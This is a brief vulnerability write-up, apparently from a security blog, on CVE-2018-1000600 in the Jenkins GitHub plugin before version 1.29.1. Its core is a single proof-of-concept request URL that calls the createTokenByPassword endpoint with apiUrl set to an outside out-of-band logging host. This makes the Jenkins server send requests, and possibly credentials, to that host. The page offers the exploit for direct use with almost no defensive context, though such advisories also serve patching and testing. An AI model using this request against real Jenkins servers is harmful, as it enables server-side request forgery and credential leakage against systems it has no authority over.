CVE-2018-1000600_Jenkins_GitHub_信息泄漏_en

# CVE-2018-1000600 Jenkins GitHub 信息泄漏/en

==Affected version==
Jenkins GitHub plugin is less than 1.29.1

The POC used is as follows, where user1 is the user name.

/securityRealm/user/user1/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://xxx.ceye.io
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容